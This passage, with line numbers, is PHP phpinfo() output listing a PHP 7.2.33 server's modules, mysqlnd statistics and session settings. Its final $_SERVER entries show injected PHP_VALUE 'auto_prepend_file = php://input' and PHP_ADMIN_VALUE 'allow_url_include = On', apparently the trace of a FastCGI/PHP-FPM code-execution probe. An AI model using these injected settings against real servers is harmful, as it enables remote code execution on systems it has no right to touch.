397 | <tr><td class="e">API Extensions </td><td class="v">pdo_mysql,mysqli </td></tr>
398 | </table>
399 | <table>
400 | <tr class="h"><th>mysqlnd statistics</th><th> </th></tr>
401 | <tr><td class="e">bytes_sent </td><td class="v">0 </td></tr>
402 | <tr><td class="e">bytes_received </td><td class="v">0 </td></tr>
403 | <tr><td class="e">packets_sent </td><td class="v">0 </td></tr>
404 | <tr><td class="e">packets_received </td><td class="v">0 </td></tr>
405 | <tr><td class="e">protocol_overhead_in </td><td class="v">0 </td></tr>
406 | <tr><td class="e">protocol_overhead_out </td><td class="v">0 </td></tr>
407 | <tr><td class="e">bytes_received_ok_packet </td><td class="v">0 </td></tr>
408 | <tr><td class="e">bytes_received_eof_packet </td><td class="v">0 </td></tr>
409 | <tr><td class="e">bytes_received_rset_header_packet </td><td class="v">0 </td></tr>
410 | <tr><td class="e">bytes_received_rset_field_meta_packet </td><td class="v">0 </td></tr>
411 | <tr><td class="e">bytes_received_rset_row_packet </td><td class="v">0 </td></tr>
412 | <tr><td class="e">bytes_received_prepare_response_packet </td><td class="v">0 </td></tr>
413 | <tr><td class="e">bytes_received_change_user_packet </td><td class="v">0 </td></tr>
414 | <tr><td class="e">packets_sent_command </td><td class="v">0 </td></tr>
415 | <tr><td class="e">packets_received_ok </td><td class="v">0 </td></tr>
416 | <tr><td class="e">packets_received_eof </td><td class="v">0 </td></tr>
417 | <tr><td class="e">packets_received_rset_header </td><td class="v">0 </td></tr>
418 | <tr><td class="e">packets_received_rset_field_meta </td><td class="v">0 </td></tr>
419 | <tr><td class="e">packets_received_rset_row </td><td class="v">0 </td></tr>
420 | <tr><td class="e">packets_received_prepare_response </td><td class="v">0 </td></tr>
421 | <tr><td class="e">packets_received_change_user </td><td class="v">0 </td></tr>
422 | <tr><td class="e">result_set_queries </td><td class="v">0 </td></tr>
423 | <tr><td class="e">non_result_set_queries </td><td class="v">0 </td></tr>
424 | <tr><td class="e">no_index_used </td><td class="v">0 </td></tr>
425 | <tr><td class="e">bad_index_used </td><td class="v">0 </td></tr>
426 | <tr><td class="e">slow_queries </td><td class="v">0 </td></tr>
427 | <tr><td class="e">buffered_sets </td><td class="v">0 </td></tr>
428 | <tr><td class="e">unbuffered_sets </td><td class="v">0 </td></tr>
429 | <tr><td class="e">ps_buffered_sets </td><td class="v">0 </td></tr>
430 | <tr><td class="e">ps_unbuffered_sets </td><td class="v">0 </td></tr>
431 | <tr><td class="e">flushed_normal_sets </td><td class="v">0 </td></tr>
432 | <tr><td class="e">flushed_ps_sets </td><td class="v">0 </td></tr>
433 | <tr><td class="e">ps_prepared_never_executed </td><td class="v">0 </td></tr>
434 | <tr><td class="e">ps_prepared_once_executed </td><td class="v">0 </td></tr>
435 | <tr><td class="e">rows_fetched_from_server_normal </td><td class="v">0 </td></tr>
436 | <tr><td class="e">rows_fetched_from_server_ps </td><td class="v">0 </td></tr>
437 | <tr><td class="e">rows_buffered_from_client_normal </td><td class="v">0 </td></tr>
438 | <tr><td class="e">rows_buffered_from_client_ps </td><td class="v">0 </td></tr>
439 | <tr><td class="e">rows_fetched_from_client_normal_buffered </td><td class="v">0 </td></tr>
440 | <tr><td class="e">rows_fetched_from_client_normal_unbuffered </td><td class="v">0 </td></tr>
441 | <tr><td class="e">rows_fetched_from_client_ps_buffered </td><td class="v">0 </td></tr>
442 | <tr><td class="e">rows_fetched_from_client_ps_unbuffered </td><td class="v">0 </td></tr>
443 | <tr><td class="e">rows_fetched_from_client_ps_cursor </td><td class="v">0 </td></tr>
444 | <tr><td class="e">rows_affected_normal </td><td class="v">0 </td></tr>
445 | <tr><td class="e">rows_affected_ps </td><td class="v">0 </td></tr>
446 | <tr><td class="e">rows_skipped_normal </td><td class="v">0 </td></tr>
447 | <tr><td class="e">rows_skipped_ps </td><td class="v">0 </td></tr>
448 | <tr><td class="e">copy_on_write_saved </td><td class="v">0 </td></tr>
449 | <tr><td class="e">copy_on_write_performed </td><td class="v">0 </td></tr>
450 | <tr><td class="e">command_buffer_too_small </td><td class="v">0 </td></tr>
451 | <tr><td class="e">connect_success </td><td class="v">0 </td></tr>
452 | <tr><td class="e">connect_failure </td><td class="v">0 </td></tr>
453 | <tr><td class="e">connection_reused </td><td class="v">0 </td></tr>
454 | <tr><td class="e">reconnect </td><td class="v">0 </td></tr>
455 | <tr><td class="e">pconnect_success </td><td class="v">0 </td></tr>
456 | <tr><td class="e">active_connections </td><td class="v">0 </td></tr>
457 | <tr><td class="e">active_persistent_connections </td><td class="v">0 </td></tr>
458 | <tr><td class="e">explicit_close </td><td class="v">0 </td></tr>
459 | <tr><td class="e">implicit_close </td><td class="v">0 </td></tr>
460 | <tr><td class="e">disconnect_close </td><td class="v">0 </td></tr>
461 | <tr><td class="e">in_middle_of_command_close </td><td class="v">0 </td></tr>
462 | <tr><td class="e">explicit_free_result </td><td class="v">0 </td></tr>
463 | <tr><td class="e">implicit_free_result </td><td class="v">0 </td></tr>
464 | <tr><td class="e">explicit_stmt_close </td><td class="v">0 </td></tr>
465 | <tr><td class="e">implicit_stmt_close </td><td class="v">0 </td></tr>
466 | <tr><td class="e">mem_emalloc_count </td><td class="v">0 </td></tr>
467 | <tr><td class="e">mem_emalloc_amount </td><td class="v">0 </td></tr>
468 | <tr><td class="e">mem_ecalloc_count </td><td class="v">0 </td></tr>
469 | <tr><td class="e">mem_ecalloc_amount </td><td class="v">0 </td></tr>
470 | <tr><td class="e">mem_erealloc_count </td><td class="v">0 </td></tr>
471 | <tr><td class="e">mem_erealloc_amount </td><td class="v">0 </td></tr>
472 | <tr><td class="e">mem_efree_count </td><td class="v">0 </td></tr>
473 | <tr><td class="e">mem_efree_amount </td><td class="v">0 </td></tr>
474 | <tr><td class="e">mem_malloc_count </td><td class="v">0 </td></tr>
475 | <tr><td class="e">mem_malloc_amount </td><td class="v">0 </td></tr>
476 | <tr><td class="e">mem_calloc_count </td><td class="v">0 </td></tr>
477 | <tr><td class="e">mem_calloc_amount </td><td class="v">0 </td></tr>
478 | <tr><td class="e">mem_realloc_count </td><td class="v">0 </td></tr>
479 | <tr><td class="e">mem_realloc_amount </td><td class="v">0 </td></tr>
480 | <tr><td class="e">mem_free_count </td><td class="v">0 </td></tr>
481 | <tr><td class="e">mem_free_amount </td><td class="v">0 </td></tr>
482 | <tr><td class="e">mem_estrndup_count </td><td class="v">0 </td></tr>
483 | <tr><td class="e">mem_strndup_count </td><td class="v">0 </td></tr>
484 | <tr><td class="e">mem_estrdup_count </td><td class="v">0 </td></tr>
485 | <tr><td class="e">mem_strdup_count </td><td class="v">0 </td></tr>
486 | <tr><td class="e">mem_edupl_count </td><td class="v">0 </td></tr>
487 | <tr><td class="e">mem_dupl_count </td><td class="v">0 </td></tr>
488 | <tr><td class="e">proto_text_fetched_null </td><td class="v">0 </td></tr>
489 | <tr><td class="e">proto_text_fetched_bit </td><td class="v">0 </td></tr>
490 | <tr><td class="e">proto_text_fetched_tinyint </td><td class="v">0 </td></tr>
491 | <tr><td class="e">proto_text_fetched_short </td><td class="v">0 </td></tr>
492 | <tr><td class="e">proto_text_fetched_int24 </td><td class="v">0 </td></tr>
493 | <tr><td class="e">proto_text_fetched_int </td><td class="v">0 </td></tr>
494 | <tr><td class="e">proto_text_fetched_bigint </td><td class="v">0 </td></tr>
495 | <tr><td class="e">proto_text_fetched_decimal </td><td class="v">0 </td></tr>
496 | <tr><td class="e">proto_text_fetched_float </td><td class="v">0 </td></tr>
497 | <tr><td class="e">proto_text_fetched_double </td><td class="v">0 </td></tr>
498 | <tr><td class="e">proto_text_fetched_date </td><td class="v">0 </td></tr>
499 | <tr><td class="e">proto_text_fetched_year </td><td class="v">0 </td></tr>
500 | <tr><td class="e">proto_text_fetched_time </td><td class="v">0 </td></tr>
501 | <tr><td class="e">proto_text_fetched_datetime </td><td class="v">0 </td></tr>
502 | <tr><td class="e">proto_text_fetched_timestamp </td><td class="v">0 </td></tr>
503 | <tr><td class="e">proto_text_fetched_string </td><td class="v">0 </td></tr>
504 | <tr><td class="e">proto_text_fetched_blob </td><td class="v">0 </td></tr>
505 | <tr><td class="e">proto_text_fetched_enum </td><td class="v">0 </td></tr>
506 | <tr><td class="e">proto_text_fetched_set </td><td class="v">0 </td></tr>
507 | <tr><td class="e">proto_text_fetched_geometry </td><td class="v">0 </td></tr>
508 | <tr><td class="e">proto_text_fetched_other </td><td class="v">0 </td></tr>
509 | <tr><td class="e">proto_binary_fetched_null </td><td class="v">0 </td></tr>
510 | <tr><td class="e">proto_binary_fetched_bit </td><td class="v">0 </td></tr>
511 | <tr><td class="e">proto_binary_fetched_tinyint </td><td class="v">0 </td></tr>
512 | <tr><td class="e">proto_binary_fetched_short </td><td class="v">0 </td></tr>
513 | <tr><td class="e">proto_binary_fetched_int24 </td><td class="v">0 </td></tr>
514 | <tr><td class="e">proto_binary_fetched_int </td><td class="v">0 </td></tr>
515 | <tr><td class="e">proto_binary_fetched_bigint </td><td class="v">0 </td></tr>
516 | <tr><td class="e">proto_binary_fetched_decimal </td><td class="v">0 </td></tr>
517 | <tr><td class="e">proto_binary_fetched_float </td><td class="v">0 </td></tr>
518 | <tr><td class="e">proto_binary_fetched_double </td><td class="v">0 </td></tr>
519 | <tr><td class="e">proto_binary_fetched_date </td><td class="v">0 </td></tr>
520 | <tr><td class="e">proto_binary_fetched_year </td><td class="v">0 </td></tr>
521 | <tr><td class="e">proto_binary_fetched_time </td><td class="v">0 </td></tr>
522 | <tr><td class="e">proto_binary_fetched_datetime </td><td class="v">0 </td></tr>
523 | <tr><td class="e">proto_binary_fetched_timestamp </td><td class="v">0 </td></tr>
524 | <tr><td class="e">proto_binary_fetched_string </td><td class="v">0 </td></tr>
525 | <tr><td class="e">proto_binary_fetched_json </td><td class="v">0 </td></tr>
526 | <tr><td class="e">proto_binary_fetched_blob </td><td class="v">0 </td></tr>
527 | <tr><td class="e">proto_binary_fetched_enum </td><td class="v">0 </td></tr>
528 | <tr><td class="e">proto_binary_fetched_set </td><td class="v">0 </td></tr>
529 | <tr><td class="e">proto_binary_fetched_geometry </td><td class="v">0 </td></tr>
530 | <tr><td class="e">proto_binary_fetched_other </td><td class="v">0 </td></tr>
531 | <tr><td class="e">init_command_executed_count </td><td class="v">0 </td></tr>
532 | <tr><td class="e">init_command_failed_count </td><td class="v">0 </td></tr>
533 | <tr><td class="e">com_quit </td><td class="v">0 </td></tr>
534 | <tr><td class="e">com_init_db </td><td class="v">0 </td></tr>
535 | <tr><td class="e">com_query </td><td class="v">0 </td></tr>
536 | <tr><td class="e">com_field_list </td><td class="v">0 </td></tr>
537 | <tr><td class="e">com_create_db </td><td class="v">0 </td></tr>
538 | <tr><td class="e">com_drop_db </td><td class="v">0 </td></tr>
539 | <tr><td class="e">com_refresh </td><td class="v">0 </td></tr>
540 | <tr><td class="e">com_shutdown </td><td class="v">0 </td></tr>
541 | <tr><td class="e">com_statistics </td><td class="v">0 </td></tr>
542 | <tr><td class="e">com_process_info </td><td class="v">0 </td></tr>
543 | <tr><td class="e">com_connect </td><td class="v">0 </td></tr>
544 | <tr><td class="e">com_process_kill </td><td class="v">0 </td></tr>
545 | <tr><td class="e">com_debug </td><td class="v">0 </td></tr>
546 | <tr><td class="e">com_ping </td><td class="v">0 </td></tr>
547 | <tr><td class="e">com_time </td><td class="v">0 </td></tr>
548 | <tr><td class="e">com_delayed_insert </td><td class="v">0 </td></tr>
549 | <tr><td class="e">com_change_user </td><td class="v">0 </td></tr>
550 | <tr><td class="e">com_binlog_dump </td><td class="v">0 </td></tr>
551 | <tr><td class="e">com_table_dump </td><td class="v">0 </td></tr>
552 | <tr><td class="e">com_connect_out </td><td class="v">0 </td></tr>
553 | <tr><td class="e">com_register_slave </td><td class="v">0 </td></tr>
554 | <tr><td class="e">com_stmt_prepare </td><td class="v">0 </td></tr>
555 | <tr><td class="e">com_stmt_execute </td><td class="v">0 </td></tr>
556 | <tr><td class="e">com_stmt_send_long_data </td><td class="v">0 </td></tr>
557 | <tr><td class="e">com_stmt_close </td><td class="v">0 </td></tr>
558 | <tr><td class="e">com_stmt_reset </td><td class="v">0 </td></tr>
559 | <tr><td class="e">com_stmt_set_option </td><td class="v">0 </td></tr>
560 | <tr><td class="e">com_stmt_fetch </td><td class="v">0 </td></tr>
561 | <tr><td class="e">com_deamon </td><td class="v">0 </td></tr>
562 | <tr><td class="e">bytes_received_real_data_normal </td><td class="v">0 </td></tr>
563 | <tr><td class="e">bytes_received_real_data_ps </td><td class="v">0 </td></tr>
564 | </table>
565 | <h2><a name="module_openssl">openssl</a></h2>
566 | <table>
567 | <tr><td class="e">OpenSSL support </td><td class="v">enabled </td></tr>
568 | <tr><td class="e">OpenSSL Library Version </td><td class="v">OpenSSL 1.0.2u  20 Dec 2019 </td></tr>
569 | <tr><td class="e">OpenSSL Header Version </td><td class="v">OpenSSL 1.0.2u  20 Dec 2019 </td></tr>
570 | <tr><td class="e">Openssl default config </td><td class="v">/usr/local/openssl/openssl.cnf </td></tr>
571 | </table>
572 | <table>
573 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
574 | <tr><td class="e">openssl.cafile</td><td class="v">/etc/pki/tls/certs/ca-bundle.crt</td><td class="v">/etc/pki/tls/certs/ca-bundle.crt</td></tr>
575 | <tr><td class="e">openssl.capath</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
576 | </table>
577 | <h2><a name="module_pcntl">pcntl</a></h2>
578 | <table>
579 | <tr class="h"><th>pcntl support</th><th>enabled</th></tr>
580 | </table>
581 | <h2><a name="module_pcre">pcre</a></h2>
582 | <table>
583 | <tr><td class="e">PCRE (Perl Compatible Regular Expressions) Support </td><td class="v">enabled </td></tr>
584 | <tr><td class="e">PCRE Library Version </td><td class="v">8.41 2017-07-05 </td></tr>
585 | <tr><td class="e">PCRE JIT Support </td><td class="v">enabled </td></tr>
586 | </table>
587 | <table>
588 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
589 | <tr><td class="e">pcre.backtrack_limit</td><td class="v">1000000</td><td class="v">1000000</td></tr>
590 | <tr><td class="e">pcre.jit</td><td class="v">1</td><td class="v">1</td></tr>
591 | <tr><td class="e">pcre.recursion_limit</td><td class="v">100000</td><td class="v">100000</td></tr>
592 | </table>
593 | <h2><a name="module_pdo">PDO</a></h2>
594 | <table>
595 | <tr class="h"><th>PDO support</th><th>enabled</th></tr>
596 | <tr><td class="e">PDO drivers </td><td class="v">sqlite, mysql </td></tr>
597 | </table>
598 | <h2><a name="module_pdo_mysql">pdo_mysql</a></h2>
599 | <table>
600 | <tr class="h"><th>PDO Driver for MySQL</th><th>enabled</th></tr>
601 | <tr><td class="e">Client API version </td><td class="v">mysqlnd 5.0.12-dev - 20150407 - $Id: 3591daad22de08524295e1bd073aceeff11e6579 $ </td></tr>
602 | </table>
603 | <table>
604 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
605 | <tr><td class="e">pdo_mysql.default_socket</td><td class="v">/tmp/mysql.sock</td><td class="v">/tmp/mysql.sock</td></tr>
606 | </table>
607 | <h2><a name="module_pdo_sqlite">pdo_sqlite</a></h2>
608 | <table>
609 | <tr class="h"><th>PDO Driver for SQLite 3.x</th><th>enabled</th></tr>
610 | <tr><td class="e">SQLite Library </td><td class="v">3.28.0 </td></tr>
611 | </table>
612 | <h2><a name="module_phar">Phar</a></h2>
613 | <table>
614 | <tr class="h"><th>Phar: PHP Archive support</th><th>enabled</th></tr>
615 | <tr><td class="e">Phar EXT version </td><td class="v">2.0.2 </td></tr>
616 | <tr><td class="e">Phar API version </td><td class="v">1.1.1 </td></tr>
617 | <tr><td class="e">SVN revision </td><td class="v">$Id: ba76a9b0e06d536a9b602c782e38e6826cb4ee02 $ </td></tr>
618 | <tr><td class="e">Phar-based phar archives </td><td class="v">enabled </td></tr>
619 | <tr><td class="e">Tar-based phar archives </td><td class="v">enabled </td></tr>
620 | <tr><td class="e">ZIP-based phar archives </td><td class="v">enabled </td></tr>
621 | <tr><td class="e">gzip compression </td><td class="v">enabled </td></tr>
622 | <tr><td class="e">bzip2 compression </td><td class="v">disabled (install pecl/bz2) </td></tr>
623 | <tr><td class="e">OpenSSL support </td><td class="v">enabled </td></tr>
624 | </table>
625 | <table>
626 | <tr class="v"><td>
627 | Phar based on pear/PHP_Archive, original concept by Davey Shafik.<br />Phar fully realized by Gregory Beaver and Marcus Boerger.<br />Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.</td></tr>
628 | </table>
629 | <table>
630 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
631 | <tr><td class="e">phar.cache_list</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
632 | <tr><td class="e">phar.readonly</td><td class="v">On</td><td class="v">On</td></tr>
633 | <tr><td class="e">phar.require_hash</td><td class="v">On</td><td class="v">On</td></tr>
634 | </table>
635 | <h2><a name="module_posix">posix</a></h2>
636 | <table>
637 | <tr><td class="e">Revision </td><td class="v">$Id: 0a764bab332255746424a1e6cfbaaeebab998e4c $ </td></tr>
638 | </table>
639 | <h2><a name="module_reflection">Reflection</a></h2>
640 | <table>
641 | <tr class="h"><th>Reflection</th><th>enabled</th></tr>
642 | <tr><td class="e">Version </td><td class="v">$Id: fe5f2178c6eb97631d3f8f03ceb9eddb88e664c7 $ </td></tr>
643 | </table>
644 | <h2><a name="module_session">session</a></h2>
645 | <table>
646 | <tr><td class="e">Session Support </td><td class="v">enabled </td></tr>
647 | <tr><td class="e">Registered save handlers </td><td class="v">files user  </td></tr>
648 | <tr><td class="e">Registered serializer handlers </td><td class="v">php_serialize php php_binary  </td></tr>
649 | </table>
650 | <table>
651 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
652 | <tr><td class="e">session.auto_start</td><td class="v">Off</td><td class="v">Off</td></tr>
653 | <tr><td class="e">session.cache_expire</td><td class="v">180</td><td class="v">180</td></tr>
654 | <tr><td class="e">session.cache_limiter</td><td class="v">nocache</td><td class="v">nocache</td></tr>
655 | <tr><td class="e">session.cookie_domain</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
656 | <tr><td class="e">session.cookie_httponly</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
657 | <tr><td class="e">session.cookie_lifetime</td><td class="v">0</td><td class="v">0</td></tr>
658 | <tr><td class="e">session.cookie_path</td><td class="v">/</td><td class="v">/</td></tr>
659 | <tr><td class="e">session.cookie_secure</td><td class="v">0</td><td class="v">0</td></tr>
660 | <tr><td class="e">session.gc_divisor</td><td class="v">1000</td><td class="v">1000</td></tr>
661 | <tr><td class="e">session.gc_maxlifetime</td><td class="v">1440</td><td class="v">1440</td></tr>
662 | <tr><td class="e">session.gc_probability</td><td class="v">1</td><td class="v">1</td></tr>
663 | <tr><td class="e">session.lazy_write</td><td class="v">On</td><td class="v">On</td></tr>
664 | <tr><td class="e">session.name</td><td class="v">PHPSESSID</td><td class="v">PHPSESSID</td></tr>
665 | <tr><td class="e">session.referer_check</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
666 | <tr><td class="e">session.save_handler</td><td class="v">files</td><td class="v">files</td></tr>
667 | <tr><td class="e">session.save_path</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
668 | <tr><td class="e">session.serialize_handler</td><td class="v">php</td><td class="v">php</td></tr>
669 | <tr><td class="e">session.sid_bits_per_character</td><td class="v">5</td><td class="v">5</td></tr>
670 | <tr><td class="e">session.sid_length</td><td class="v">26</td><td class="v">26</td></tr>
671 | <tr><td class="e">session.upload_progress.cleanup</td><td class="v">On</td><td class="v">On</td></tr>
672 | <tr><td class="e">session.upload_progress.enabled</td><td class="v">On</td><td class="v">On</td></tr>
673 | <tr><td class="e">session.upload_progress.freq</td><td class="v">1%</td><td class="v">1%</td></tr>
674 | <tr><td class="e">session.upload_progress.min_freq</td><td class="v">1</td><td class="v">1</td></tr>
675 | <tr><td class="e">session.upload_progress.name</td><td class="v">PHP_SESSION_UPLOAD_PROGRESS</td><td class="v">PHP_SESSION_UPLOAD_PROGRESS</td></tr>
676 | <tr><td class="e">session.upload_progress.prefix</td><td class="v">upload_progress_</td><td class="v">upload_progress_</td></tr>
677 | <tr><td class="e">session.use_cookies</td><td class="v">1</td><td class="v">1</td></tr>
678 | <tr><td class="e">session.use_only_cookies</td><td class="v">1</td><td class="v">1</td></tr>
679 | <tr><td class="e">session.use_strict_mode</td><td class="v">0</td><td class="v">0</td></tr>
680 | <tr><td class="e">session.use_trans_sid</td><td class="v">0</td><td class="v">0</td></tr>
681 | </table>
682 | <h2><a name="module_shmop">shmop</a></h2>
683 | <table>
684 | <tr><td class="e">shmop support </td><td class="v">enabled </td></tr>
685 | </table>
686 | <h2><a name="module_simplexml">SimpleXML</a></h2>
687 | <table>
688 | <tr class="h"><th>Simplexml support</th><th>enabled</th></tr>
689 | <tr><td class="e">Revision </td><td class="v">$Id: 341daed0ee94ea8f728bfd0ba4626e6ed365c0d1 $ </td></tr>
690 | <tr><td class="e">Schema support </td><td class="v">enabled </td></tr>
691 | </table>
692 | <h2><a name="module_soap">soap</a></h2>
693 | <table>
694 | <tr><td class="e">Soap Client </td><td class="v">enabled </td></tr>
695 | <tr><td class="e">Soap Server </td><td class="v">enabled </td></tr>
696 | </table>
697 | <table>
698 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
699 | <tr><td class="e">soap.wsdl_cache</td><td class="v">1</td><td class="v">1</td></tr>
700 | <tr><td class="e">soap.wsdl_cache_dir</td><td class="v">/tmp</td><td class="v">/tmp</td></tr>
701 | <tr><td class="e">soap.wsdl_cache_enabled</td><td class="v">1</td><td class="v">1</td></tr>
702 | <tr><td class="e">soap.wsdl_cache_limit</td><td class="v">5</td><td class="v">5</td></tr>
703 | <tr><td class="e">soap.wsdl_cache_ttl</td><td class="v">86400</td><td class="v">86400</td></tr>
704 | </table>
705 | <h2><a name="module_sockets">sockets</a></h2>
706 | <table>
707 | <tr><td class="e">Sockets Support </td><td class="v">enabled </td></tr>
708 | </table>
709 | <h2><a name="module_spl">SPL</a></h2>
710 | <table>
711 | <tr class="h"><th>SPL support</th><th>enabled</th></tr>
712 | <tr><td class="e">Interfaces </td><td class="v">OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject </td></tr>
713 | <tr><td class="e">Classes </td><td class="v">AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException </td></tr>
714 | </table>
715 | <h2><a name="module_sqlite3">sqlite3</a></h2>
716 | <table>
717 | <tr class="h"><th>SQLite3 support</th><th>enabled</th></tr>
718 | <tr><td class="e">SQLite3 module version </td><td class="v">7.2.33 </td></tr>
719 | <tr><td class="e">SQLite Library </td><td class="v">3.28.0 </td></tr>
720 | </table>
721 | <table>
722 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
723 | <tr><td class="e">sqlite3.defensive</td><td class="v">1</td><td class="v">1</td></tr>
724 | <tr><td class="e">sqlite3.extension_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
725 | </table>
726 | <h2><a name="module_standard">standard</a></h2>
727 | <table>
728 | <tr><td class="e">Dynamic Library Support </td><td class="v">enabled </td></tr>
729 | <tr><td class="e">Path to sendmail </td><td class="v">/usr/sbin/sendmail -t -i </td></tr>
730 | </table>
731 | <table>
732 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
733 | <tr><td class="e">assert.active</td><td class="v">1</td><td class="v">1</td></tr>
734 | <tr><td class="e">assert.bail</td><td class="v">0</td><td class="v">0</td></tr>
735 | <tr><td class="e">assert.callback</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
736 | <tr><td class="e">assert.exception</td><td class="v">0</td><td class="v">0</td></tr>
737 | <tr><td class="e">assert.quiet_eval</td><td class="v">0</td><td class="v">0</td></tr>
738 | <tr><td class="e">assert.warning</td><td class="v">1</td><td class="v">1</td></tr>
739 | <tr><td class="e">auto_detect_line_endings</td><td class="v">0</td><td class="v">0</td></tr>
740 | <tr><td class="e">default_socket_timeout</td><td class="v">60</td><td class="v">60</td></tr>
741 | <tr><td class="e">from</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
742 | <tr><td class="e">session.trans_sid_hosts</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
743 | <tr><td class="e">session.trans_sid_tags</td><td class="v">a=href,area=href,frame=src,form=</td><td class="v">a=href,area=href,frame=src,form=</td></tr>
744 | <tr><td class="e">url_rewriter.hosts</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
745 | <tr><td class="e">url_rewriter.tags</td><td class="v">form=</td><td class="v">form=</td></tr>
746 | <tr><td class="e">user_agent</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
747 | </table>
748 | <h2><a name="module_sysvsem">sysvsem</a></h2>
749 | <table>
750 | <tr><td class="e">Version </td><td class="v">7.2.33 </td></tr>
751 | </table>
752 | <h2><a name="module_tokenizer">tokenizer</a></h2>
753 | <table>
754 | <tr><td class="e">Tokenizer Support </td><td class="v">enabled </td></tr>
755 | </table>
756 | <h2><a name="module_xml">xml</a></h2>
757 | <table>
758 | <tr><td class="e">XML Support </td><td class="v">active </td></tr>
759 | <tr><td class="e">XML Namespace Support </td><td class="v">active </td></tr>
760 | <tr><td class="e">libxml2 Version </td><td class="v">2.9.1 </td></tr>
761 | </table>
762 | <h2><a name="module_xmlreader">xmlreader</a></h2>
763 | <table>
764 | <tr><td class="e">XMLReader </td><td class="v">enabled </td></tr>
765 | </table>
766 | <h2><a name="module_xmlrpc">xmlrpc</a></h2>
767 | <table>
768 | <tr><td class="e">core library version </td><td class="v">xmlrpc-epi v. 0.51 </td></tr>
769 | <tr><td class="e">php extension version </td><td class="v">7.2.33 </td></tr>
770 | <tr><td class="e">author </td><td class="v">Dan Libby </td></tr>
771 | <tr><td class="e">homepage </td><td class="v">http://xmlrpc-epi.sourceforge.net </td></tr>
772 | <tr><td class="e">open sourced by </td><td class="v">Epinions.com </td></tr>
773 | </table>
774 | <h2><a name="module_xmlwriter">xmlwriter</a></h2>
775 | <table>
776 | <tr><td class="e">XMLWriter </td><td class="v">enabled </td></tr>
777 | </table>
778 | <h2><a name="module_zip">zip</a></h2>
779 | <table>
780 | <tr><td class="e">Zip </td><td class="v">enabled </td></tr>
781 | <tr><td class="e">Zip version </td><td class="v">1.15.4 </td></tr>
782 | <tr><td class="e">Libzip version </td><td class="v">1.1.2 </td></tr>
783 | </table>
784 | <h2><a name="module_zlib">zlib</a></h2>
785 | <table>
786 | <tr class="h"><th>ZLib Support</th><th>enabled</th></tr>
787 | <tr><td class="e">Stream Wrapper </td><td class="v">compress.zlib:// </td></tr>
788 | <tr><td class="e">Stream Filter </td><td class="v">zlib.inflate, zlib.deflate </td></tr>
789 | <tr><td class="e">Compiled Version </td><td class="v">1.2.7 </td></tr>
790 | <tr><td class="e">Linked Version </td><td class="v">1.2.7 </td></tr>
791 | </table>
792 | <table>
793 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
794 | <tr><td class="e">zlib.output_compression</td><td class="v">Off</td><td class="v">Off</td></tr>
795 | <tr><td class="e">zlib.output_compression_level</td><td class="v">-1</td><td class="v">-1</td></tr>
796 | <tr><td class="e">zlib.output_handler</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
797 | </table>
798 | <h2>Additional Modules</h2>
799 | <table>
800 | <tr class="h"><th>Module Name</th></tr>
801 | </table>
802 | <h2>Environment</h2>
803 | <table>
804 | <tr class="h"><th>Variable</th><th>Value</th></tr>
805 | <tr><td class="e">USER </td><td class="v">www </td></tr>
806 | <tr><td class="e">HOME </td><td class="v">/home/www </td></tr>
807 | </table>
808 | <h2>PHP Variables</h2>
809 | <table>
810 | <tr class="h"><th>Variable</th><th>Value</th></tr>
811 | <tr><td class="e">$_SERVER['USER']</td><td class="v">www</td></tr>
812 | <tr><td class="e">$_SERVER['HOME']</td><td class="v">/home/www</td></tr>
813 | <tr><td class="e">$_SERVER['PHP_ADMIN_VALUE']</td><td class="v">allow_url_include = On</td></tr>
814 | <tr><td class="e">$_SERVER['PHP_VALUE']</td><td class="v">auto_prepend_file = php://input</td></tr>
815 | <tr><td class="e">$_SERVER['CONTENT_LENGTH']</td><td class="v">25</td></tr>
816 | <tr><td class="e">$_SERVER['CONTENT_TYPE']</td><td class="v">application/text</td></tr>
817 | <tr><td class="e">$_SERVER['SERVER_PROTOCOL']</td><td class="v">HTTP/1.1</td></tr>
818 | <tr><td class="e">$_SERVER['SERVER_NAME']</td><td class="v">localhost</td></tr>
819 | <tr><td class="e">$_SERVER['SERVER_PORT']</td><td class="v">80</td></tr>
